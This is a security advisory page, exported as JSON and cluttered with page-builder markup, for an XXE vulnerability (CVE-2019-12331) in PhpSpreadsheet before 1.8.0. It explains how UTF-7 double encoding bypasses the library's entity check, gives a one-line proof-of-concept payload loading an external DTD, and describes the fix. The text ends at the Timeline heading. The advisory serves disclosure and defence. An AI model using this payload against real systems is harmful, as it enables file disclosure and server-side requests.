{"id":16619,"date":"2021-07-08T11:27:30","date_gmt":"2021-07-08T09:27:30","guid":{"rendered":"https:\/\/herolab-usd.formwandler.rocks\/security-advisories\/usd-2019-0046\/"},"modified":"2021-07-19T14:11:54","modified_gmt":"2021-07-19T12:11:54","slug":"usd-2019-0046","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2019-0046\/","title":{"rendered":"usd-2019-0046"},"content":{"rendered":"

[et_pb_section fb_built=\"1\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\"]<\/p>\n

usd-2019-0046 | PhpSpreadsheet <1.8.0<\/span><\/h1>\n

<\/span>
Advisory ID<\/strong>: usd-2019-0046<\/span>
CVE Number<\/strong>: CVE-2019-12331<\/span>
Affected Product<\/strong>: PhpSpreadsheet<\/span>
Affected Version<\/strong>: <1.8.0<\/span>
Vulnerability Type<\/strong>: XML External Entity (XXE)<\/span>
Security Risk<\/strong>: High<\/span>
Vendor URL<\/strong>: <\/span>https:\/\/phpspreadsheet.readthedocs.io\/<\/a>
Vendor Status<\/strong>: Fixed<\/span><\/p>\n

<\/h3>\n

Description<\/h3>\n

The XmlScanner decodes the sheet1.xml from an .xlsx to utf-8 if something else than \u201eUTF-8\u201c is declared in the header.<\/span>
This was a security measurement to prevent CVE-2018-19277. But the fix is not sufficient. By double encode the xml payload to utf-7<\/span>
it is possible to bypass the check for the string \u201a<!ENTITY\u2018. Furthermore, even though the entity loader gets disabled by calling libxml_disable_entity_loader() before<\/span>
the security check, which only uses regexp, it gets enabled again before the xml is parsed with simplexml_load_string().<\/span>
This leads to an enabled entity loader while parsing the .xml, no matter which PHP version is used.<\/span>
Even though this example uses Reader\\Xlsx.php, all readers which directly feed the returned xml from the XmlScanner::load() method to simplexml_load_string()<\/span>
should be vulnerable (xml, ods, html, gnumeric).<\/span><\/p>\n

<\/span><\/p>\n

Proof of Concept (PoC)<\/h3>\n

Put the content into sheet1.xml and repack a .xlsx file:<\/span><\/p>\n

[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" hover_enabled=\"0\" sticky_enabled=\"0\"]+-ADwAIQ-DOCTYPE xmlrootname +-AFsAPAAh-ENTITY +-ACU aaa SYSTEM +-ACI-http:\/\/127.0.0.1:8080\/ext.dtd+-ACIAPgAl-aaa+-ADsAJQ-ccc+-ADsAJQ-ddd+-ADsAXQA+-<\/code><\/pre>\n

[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\"]<\/p>\n

When loading the .xlsx the library tries to load ext.dtd from http:\/\/127.0.0.1.8080.<\/span><\/p>\n

[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\"]<\/p>\n

\n
\n

Fix<\/h3>\n

Fix the call to libxml_disable_entity_loader() and set the encoding from the xml file after the encoding to the correct value.<\/span><\/p>\n

<\/h3>\n

Timeline<\/h3>\n